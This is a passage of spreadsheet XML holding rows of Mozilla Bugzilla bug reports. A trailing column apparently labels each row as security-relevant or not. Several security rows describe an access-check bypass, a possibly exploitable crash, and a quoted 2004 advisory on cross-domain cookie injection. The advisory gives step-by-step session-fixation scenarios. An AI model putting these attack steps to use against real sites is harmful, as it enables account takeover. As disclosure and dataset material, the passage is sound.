[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_b_o TEST-UNEXPECTED-FAIL
[task 2020-03-05T23:01:36.607Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_build_o TEST-UNEXPECTED-FAIL
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_fail_email PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_interactive PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_j_all PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_j_job PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_j_jobs PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_j_twice PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_no_email PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_no_retry PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_p_all PASSED
[task 2020-03-05T23:01:36.608Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_p_expands_ridealongs PASSED
[task 2020-03-05T23:01:36.609Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_p_linux PASSED
[task 2020-03-05T23:01:36.610Z]  0:32.08 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_p_linux_win32 PASSED
[task 2020-03-05T23:01:36.610Z]  0:32.09 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_profile PASSED
[task 2020-03-05T23:01:36.611Z]  0:32.09 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_setenv PASSED
[task 2020-03-05T23:01:36.611Z]  0:32.09 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_t_all PASSED
[task 2020-03-05T23:01:36.611Z]  0:32.09 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_t_none PASSED
[task 2020-03-05T23:01:36.611Z]  0:32.09 taskcluster/taskgraph/test/test_try_option_syntax.py::TestTryOptionSyntax::test_t_single PASSED
```</t>
        </is>
      </c>
      <c r="X541" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="542">
      <c r="A542" t="n">
        <v>382056</v>
      </c>
      <c r="B542" t="inlineStr">
        <is>
          <t>2007-05-25 15:10:17 -0700</t>
        </is>
      </c>
      <c r="C542" t="inlineStr">
        <is>
          <t>[SECURITY] Bugzilla::Webservice::Bug-&gt;get_bugs() doesn't check if the user is in the timetracking group when returning data</t>
        </is>
      </c>
      <c r="D542" t="inlineStr">
        <is>
          <t>2011-09-24 05:56:05 -0700</t>
        </is>
      </c>
      <c r="E542" t="n">
        <v>1</v>
      </c>
      <c r="F542" t="n">
        <v>1</v>
      </c>
      <c r="G542" t="n">
        <v>4</v>
      </c>
      <c r="H542" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I542" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J542" t="inlineStr">
        <is>
          <t>WebService</t>
        </is>
      </c>
      <c r="K542" t="inlineStr">
        <is>
          <t>2.23.3</t>
        </is>
      </c>
      <c r="L542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M542" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N542" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O542" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P542" t="inlineStr">
        <is>
          <t>[ready for 3.0.1][ready for 3.1.1]</t>
        </is>
      </c>
      <c r="Q542" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R542" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S542" t="inlineStr">
        <is>
          <t>Bugzilla 3.0</t>
        </is>
      </c>
      <c r="T542" t="n">
        <v>1</v>
      </c>
      <c r="U542" t="n">
        <v>0</v>
      </c>
      <c r="V542" t="n">
        <v>16</v>
      </c>
      <c r="W542" t="inlineStr">
        <is>
          <t>While playing with contrib/bz_webservice_demo.pl, I realized that time related data are available even if you are logged out or logged in but not in the timetracking group. So it allows me to bypass some sec checks.</t>
        </is>
      </c>
      <c r="X542" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="543">
      <c r="A543" t="n">
        <v>555267</v>
      </c>
      <c r="B543" t="inlineStr">
        <is>
          <t>2010-03-26 12:16:09 -0700</t>
        </is>
      </c>
      <c r="C543" t="inlineStr">
        <is>
          <t>make puppet run only at boot on linux build slaves</t>
        </is>
      </c>
      <c r="D543" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E543" t="n">
        <v>1</v>
      </c>
      <c r="F543" t="n">
        <v>1</v>
      </c>
      <c r="G543" t="n">
        <v>5</v>
      </c>
      <c r="H543" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I543" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J543" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K543" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L543" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M543" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N543" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O543" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P543" t="inlineStr"/>
      <c r="Q543" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R543" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S543" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T543" t="n">
        <v>1</v>
      </c>
      <c r="U543" t="n">
        <v>0</v>
      </c>
      <c r="V543" t="n">
        <v>10</v>
      </c>
      <c r="W543" t="inlineStr">
        <is>
          <t>as per summary</t>
        </is>
      </c>
      <c r="X543" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="544">
      <c r="A544" t="n">
        <v>493281</v>
      </c>
      <c r="B544" t="inlineStr">
        <is>
          <t>2009-05-15 12:56:35 -0700</t>
        </is>
      </c>
      <c r="C544" t="inlineStr">
        <is>
          <t>Possible Stack Corruption starting at Unknown Symbol @ 0x6d89c0006d89c</t>
        </is>
      </c>
      <c r="D544" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E544" t="n">
        <v>1</v>
      </c>
      <c r="F544" t="n">
        <v>1</v>
      </c>
      <c r="G544" t="n">
        <v>3</v>
      </c>
      <c r="H544" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I544" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J544" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K544" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L544" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M544" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N544" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P544" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q544" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R544" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S544" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T544" t="n">
        <v>1</v>
      </c>
      <c r="U544" t="n">
        <v>0</v>
      </c>
      <c r="V544" t="n">
        <v>26</v>
      </c>
      <c r="W544" t="inlineStr">
        <is>
          <t>Steps to reproduce:
-&gt; Load http://www.tuning.fr/compts/compteurs.php?compts_id=1670&amp;scrw=1680
--&gt; Crashs 1.9.1 opt/debug builds Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b5pre) Gecko/20090515 Shiretoko/3.5b5pre and trunk 
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2a1pre) Gecko/20090515 Minefield/3.6a1pre
(fa8.18c): Access violation - code c0000005 (!!! second chance !!!)
eax=3ecb3f57 ebx=7ffdf000 ecx=0012ea4c edx=06389f15 esi=00d0b4e8 edi=00150000
eip=06389f39 esp=0012d934 ebp=0012d950 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
06389f39 3b00            cmp     eax,dword ptr [eax]  ds:0023:3ecb3f57=????????
The stack trace contains one or more locations for which no symbol or module could be found. This may be a sign of stack corruption.
ChildEBP RetAddr
WARNING: Frame IP not in any known module. Following frames may be wrong.
0012d930 0028b31d 0x6389f39
0012d950 02c6dc49 xpcom_core!nsQueryInterface::operator()+0x2d
0284f81c 6c6c697a gklayout!nsCOMPtr&lt;nsIDOMHTMLDocument&gt;::assign_from_qi+0x19
0284f81c 00000000 0x6c6c697a
quit:</t>
        </is>
      </c>
      <c r="X544" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="545">
      <c r="A545" t="n">
        <v>1478351</v>
      </c>
      <c r="B545" t="inlineStr">
        <is>
          <t>2018-07-25 06:37:20 -0700</t>
        </is>
      </c>
      <c r="C545" t="inlineStr">
        <is>
          <t>[tracker] support rust</t>
        </is>
      </c>
      <c r="D545" t="inlineStr">
        <is>
          <t>2018-10-19 04:12:18 -0700</t>
        </is>
      </c>
      <c r="E545" t="n">
        <v>1</v>
      </c>
      <c r="F545" t="n">
        <v>1</v>
      </c>
      <c r="G545" t="n">
        <v>4</v>
      </c>
      <c r="H545" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I545" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J545" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K545" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L545" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M545" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N545" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P545" t="inlineStr"/>
      <c r="Q545" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R545" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S545" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T545" t="n">
        <v>1</v>
      </c>
      <c r="U545" t="n">
        <v>0</v>
      </c>
      <c r="V545" t="n">
        <v>12</v>
      </c>
      <c r="W545" t="inlineStr">
        <is>
          <t>Firefox and other Mozilla products are increasing their use of Rust. Additionally, Rust is changing over time including changes to std and compiler.
As time goes on, these two facts are surfacing issues in Socorro related to its handling of Rust code.
This tracker bug covers grouping all those issues into a "support rust better" project.</t>
        </is>
      </c>
      <c r="X545" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="546">
      <c r="A546" t="n">
        <v>650273</v>
      </c>
      <c r="B546" t="inlineStr">
        <is>
          <t>2011-04-15 07:12:22 -0700</t>
        </is>
      </c>
      <c r="C546" t="inlineStr">
        <is>
          <t>"Assertion failure: compartment mismatched" with setTimeout</t>
        </is>
      </c>
      <c r="D546" t="inlineStr">
        <is>
          <t>2011-11-14 18:53:39 -0800</t>
        </is>
      </c>
      <c r="E546" t="n">
        <v>1</v>
      </c>
      <c r="F546" t="n">
        <v>1</v>
      </c>
      <c r="G546" t="n">
        <v>3</v>
      </c>
      <c r="H546" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I546" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J546" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K546" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L546" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M546" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N546" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P546" t="inlineStr">
        <is>
          <t>[sg:nse] fixed-in-tracemonkey [this and 659207 need approval together if at all]</t>
        </is>
      </c>
      <c r="Q546" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R546" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S546" t="inlineStr">
        <is>
          <t>mozilla6</t>
        </is>
      </c>
      <c r="T546" t="n">
        <v>1</v>
      </c>
      <c r="U546" t="n">
        <v>0</v>
      </c>
      <c r="V546" t="n">
        <v>26</v>
      </c>
      <c r="W546" t="inlineStr">
        <is>
          <t>Created attachment 526244
testcase (crashes Firefox when loaded)
Assertion failure: compartment mismatched, at js/src/jscntxtinlines.h:542</t>
        </is>
      </c>
      <c r="X546" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="547">
      <c r="A547" t="n">
        <v>252342</v>
      </c>
      <c r="B547" t="inlineStr">
        <is>
          <t>2004-07-20 14:38:10 -0700</t>
        </is>
      </c>
      <c r="C547" t="inlineStr">
        <is>
          <t>fix cookie domain checks to not allow .co.uk</t>
        </is>
      </c>
      <c r="D547" t="inlineStr">
        <is>
          <t>2014-04-25 15:15:08 -0700</t>
        </is>
      </c>
      <c r="E547" t="n">
        <v>1</v>
      </c>
      <c r="F547" t="n">
        <v>1</v>
      </c>
      <c r="G547" t="n">
        <v>3</v>
      </c>
      <c r="H547" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I547" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J547" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K547" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M547" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N547" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P547" t="inlineStr">
        <is>
          <t>[sg:low dos][no l10n impact][would take patch]</t>
        </is>
      </c>
      <c r="Q547" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R547" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S547" t="inlineStr">
        <is>
          <t>mozilla1.9alpha8</t>
        </is>
      </c>
      <c r="T547" t="n">
        <v>1</v>
      </c>
      <c r="U547" t="n">
        <v>16</v>
      </c>
      <c r="V547" t="n">
        <v>94</v>
      </c>
      <c r="W547" t="inlineStr">
        <is>
          <t>Title:        Multiple Browser Cookie Injection Vulnerabilities
Risk Rating:  Moderate
Software:     Multiple Web Browsers
Platforms:    Unix and Windows
Author:       Paul Johnston &lt;paul@westpoint.ltd.uk&gt;
             assisted by Richard Moore &lt;rich@westpoint.ltd.uk&gt;
Date:         20 July 2004
Advisory ID#: wp-04-0001
CVE:          &lt;pending&gt;
Overview
--------
A design goal for cookies is to "prevent the sharing of session
information between hosts that are in different domains." [1] It appears
current implementations are successful at allowing a domain to keep its
cookies private. However, multiple mechanisms have been discovered for one
domain to inject cookies into another. These could be used to perform
session fixation attacks against web applications. [2]
(14:30:08) Chris: 
Cross-Domain Cookie Injection
-----------------------------
Vulnerable: Internet Explorer, Konqueror, Mozilla
By default, cookies are only sent to the host that issued them. There is
an optonal "domain" attribute that overrides this behaviour. For example,
red.example.com could set a cookie with domain=.example.com. This would
then be sent to any host in the .example.com domain.
There is potential for abuse here, consider the case where red.example.com
sets a cookie with domain=.com. In principle this would be sent to any
host in the .com domain. However [1] requires browsers to reject cookies
where:
 "The value for the Domain attribute contains no embedded dots"
This prevents a cookie being set with domain=.com. However, this does not
extend to country domains that are split into two parts. For example,
red.example.co.uk could set a cookie with domain=.co.uk and this will be
sent to all hosts in the .co.uk domain. Mozilla follows the RFC exactly
and is vulnerable to this. Konqueror and Internet Explorer have some
further protection, preventing domains of the following forms:
 * Where the 2nd level domain is two or fewer characters, i.e. xx.yy or
   x.yy
 * Domains of the form (com|net|mil|org|gov|edu|int).yy
This does prevent .co.uk cross domain cookie injection but does not
protect all domains. For example, the the following .uk domains are
unprotected:
 .ltd.uk
 .plc.uk
 .sch.uk
 .nhs.uk
 .police.uk
 .mod.uk
Interestingly, some old Netscape documentation [3] specifies the following
restriction:
(14:30:29) Chris:  "Any domain in the COM, EDU, NET, ORG, GOV, MIL, and INT
categories
 requires only two periods; all other domains require at least three
 periods."
This is what Opera does. It seems a sensible choice as it tends more
towards "accept only known good input" rather than "reject known bad
input", a principle of secure design.
Example exploitation:
 1) http://example.ltd.uk/ is identified for attack. It uses the "sid"
    cookie to hold the session ID.
 2) Attacker obtains attacker.ltd.uk domain
 3) User is enticed to click link to http://attacker.ltd.uk/
 4) This site sets the "sid" cookie with domain=.ltd.uk
 5) When user logs into example.ltd.uk, they are using a sesion ID known
    to the attacker.
 6) Attacker now has a logged-in session ID and has compromised the
    user's account.
Exploitation is dependent on the user clicking an untrusted link. However,
it is fundamental to the use of the web that we do sometimes click
untrusted links. This attack can happen regardless of the use of SSL.
Cross Security Boundary Cookie Injection
----------------------------------------
Vulnerable: all tested browsers
By default cookies are sent to all ports on the host that issued them,
regardless of whether SSL is in use. There is an optional "secure"
attribute that restricts sending to secure channels. This prevents secure
cookies for leaking out over insecure channels. However, there is no
protection to prevent cookies set over a non-secure channel being
presented on a secure channel. In general to maintain proper boundaries
between security levels, it is necessary to defend against both attacks -
protecting both confidentiality and integrity.
Example exploitation:
 1) https://example.com/ identified for attack, which uses "sid" cookie
    as session ID.
 2) User is enticed to click link to http://example.com/
 3) By some mechanism the attacker intercepts this request and sets the
    "sid" cookie
 4) When user logs into https://example.com/ they are using a sesion ID
    known to the attacker.
 5) Attacker now has a logged-in session ID and has compromised the
    user's account.
In addition to the user clicking an untrusted link, exploitation is
dependent on the attacker tampering with non-SSL network traffic. This is
a reasonable assumption as the purpose of SSL is to provide security over
an insecure network.</t>
        </is>
      </c>
      <c r="X547" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="548">
      <c r="A548" t="n">
        <v>449208</v>
      </c>
      <c r="B548" t="inlineStr">
        <is>
          <t>2008-08-05 05:45:56 -0700</t>
        </is>
      </c>
      <c r="C548" t="inlineStr">
        <is>
          <t>move Bootstrap's version bumping logic to an external script</t>
        </is>
      </c>
      <c r="D548" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E548" t="n">
        <v>1</v>
      </c>
      <c r="F548" t="n">
        <v>1</v>
      </c>
      <c r="G548" t="n">
        <v>5</v>
      </c>
      <c r="H548" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I548" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J548" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K548" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L548" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M548" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N548" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P548" t="inlineStr">
        <is>
          <t>[hg-automation]</t>
        </is>
      </c>
      <c r="Q548" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R548" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T548" t="n">
        <v>1</v>
      </c>
      <c r="U548" t="n">
        <v>0</v>
      </c>
      <c r="V548" t="n">
        <v>24</v>
      </c>
      <c r="W548" t="inlineStr">
        <is>
          <t>Bootstrap should be modified to use this script to avoid duplicating this logic anywhere.
The new script should live in http://hg.mozilla.org/build/tools.</t>
        </is>
      </c>
      <c r="X548" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="549">
      <c r="A549" t="n">
        <v>515811</v>
      </c>
      <c r="B549" t="inlineStr">
        <is>
          <t>2009-09-10 16:21:54 -0700</t>
        </is>
      </c>
      <c r="C549" t="inlineStr">
        <is>
          <t>"ASSERTION: Some PresArena objects were not freed" with -moz-column, floats, huge font</t>
        </is>
      </c>
      <c r="D549" t="inlineStr">
        <is>
          <t>2010-04-06 17:15:31 -0700</t>
        </is>
      </c>
      <c r="E549" t="n">
        <v>1</v>
      </c>
      <c r="F549" t="n">
        <v>1</v>
      </c>
      <c r="G549" t="n">
        <v>3</v>
      </c>
      <c r="H549" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I549" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J549" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K549" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L549" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M549" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N549" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P549" t="inlineStr">
        <is>
          <t>[sg:critical?] for 1.9.2 branch and earlier</t>
        </is>
      </c>
      <c r="Q549" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R549" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S549" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T549" t="n">
        <v>1</v>
      </c>
      <c r="U549" t="n">
        <v>0</v>
      </c>
      <c r="V549" t="n">
        <v>19</v>
      </c>
      <c r="W549" t="inlineStr">
        <is>
          <t>Created attachment 399876
testcase (triggers assertion when closed)
###!!! ASSERTION: Some PresArena objects were not freed: 'mAllocCount == 0', file /Users/jruderman/central/layout/base/nsPresArena.cpp, line 169
Seems exploitable, but I'm not as sure as usual.</t>
        </is>
      </c>
      <c r="X549" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="550">
      <c r="A550" t="n">
        <v>1403142</v>
      </c>
      <c r="B550" t="inlineStr">
        <is>
          <t>2017-09-26 05:14:03 -0700</t>
        </is>
      </c>
      <c r="C550" t="inlineStr">
        <is>
          <t>Add Sentry logging to NotificationService to help monitor blank notifications</t>
        </is>
      </c>
      <c r="D550" t="inlineStr">
        <is>
          <t>2017-10-03 08:59:25 -0700</t>
        </is>
      </c>
      <c r="E550" t="n">
        <v>1</v>
      </c>
      <c r="F550" t="n">
        <v>1</v>
      </c>
      <c r="G550" t="n">
        <v>2</v>
      </c>
      <c r="H550" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I550" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J550" t="inlineStr">
        <is>
          <t>Telemetry</t>
        </is>
      </c>
      <c r="K550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L550" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M550" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N550" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P550" t="inlineStr"/>
      <c r="Q550" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R550" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S550" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T550" t="n">
        <v>1</v>
      </c>
      <c r="U550" t="n">
        <v>0</v>
      </c>
      <c r="V550" t="n">
        <v>5</v>
      </c>
      <c r="W550" t="inlineStr">
        <is>
          <t>Occasionally we are still getting Blank notifications and errant Tap to begin notifications.
We need to understand how often these are being seen in the wild, and potential causes for them. 
This bug is for instrumenting NotificationService and FxAPushMessageHandler with Sentry events to help understand this problem.</t>
        </is>
      </c>
      <c r="X550" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="551">
      <c r="A551" t="n">
        <v>189672</v>
      </c>
      <c r="B551" t="inlineStr">
        <is>
          <t>2003-01-19 05:56:14 -0800</t>
        </is>
      </c>
      <c r="C551" t="inlineStr">
        <is>
          <t>100% CPU, exhaust system resource, freeze mozilla, while displaying page</t>
        </is>
      </c>
      <c r="D551" t="inlineStr">
        <is>
          <t>2003-07-01 10:42:54 -0700</t>
        </is>
      </c>
      <c r="E551" t="n">
        <v>1</v>
      </c>
      <c r="F551" t="n">
        <v>1</v>
      </c>
      <c r="G551" t="n">
        <v>3</v>
      </c>
      <c r="H551" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I551" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J551" t="inlineStr">
        <is>
          <t>Networking: HTTP</t>
        </is>
      </c>
      <c r="K551" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N551" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P551" t="inlineStr"/>
      <c r="Q551" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R551" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S551" t="inlineStr">
        <is>
          <t>mozilla1.3beta</t>
        </is>
      </c>
      <c r="T551" t="n">
        <v>1</v>
      </c>
      <c r="U551" t="n">
        <v>0</v>
      </c>
      <c r="V551" t="n">
        <v>27</v>
      </c>
      <c r="W551" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.3b) Gecko/20030118
Build Identifier: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.3b) Gecko/20030118
Visit the page at http://www.geocities.com/squatter.geo/ or under the 
directories.
After some seconds, thorbber animation stops.
System resource is extremely reduced. If don't anything (exit mozilla, 
push ESC key, click Stop toolbar button or go another page), goes 0%.
Therefore freeze mozilla.
Reproducible: Always
Steps to Reproduce:
1. Visit the page. http://www.geocities.com/squatter.geo/
2. Wait for a while (about a minute).
Actual Results:  
Freeze Mozilla.
Resouce meter alarms few remain resouce.
Sometimes OS freeze also.
Expected Results:  
No freeze.
OS: Win98
2003-01-18-04-trunk (Build ID: 2003011804)</t>
        </is>
      </c>
      <c r="X551" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="552">
      <c r="A552" t="n">
        <v>1145389</v>
      </c>
      <c r="B552" t="inlineStr">
        <is>
          <t>2015-03-19 15:24:37 -0700</t>
        </is>
      </c>
      <c r="C552" t="inlineStr">
        <is>
          <t>Upper bound check bypass due to signed compare in SharedBufferManagerParent::RecvAllocateGrallocBuffer</t>
        </is>
      </c>
      <c r="D552" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:18 -0700</t>
        </is>
      </c>
      <c r="E552" t="n">
        <v>1</v>
      </c>
      <c r="F552" t="n">
        <v>1</v>
      </c>
      <c r="G552" t="n">
        <v>3</v>
      </c>
      <c r="H552" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I552" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J552" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K552" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M552" t="inlineStr">
        <is>
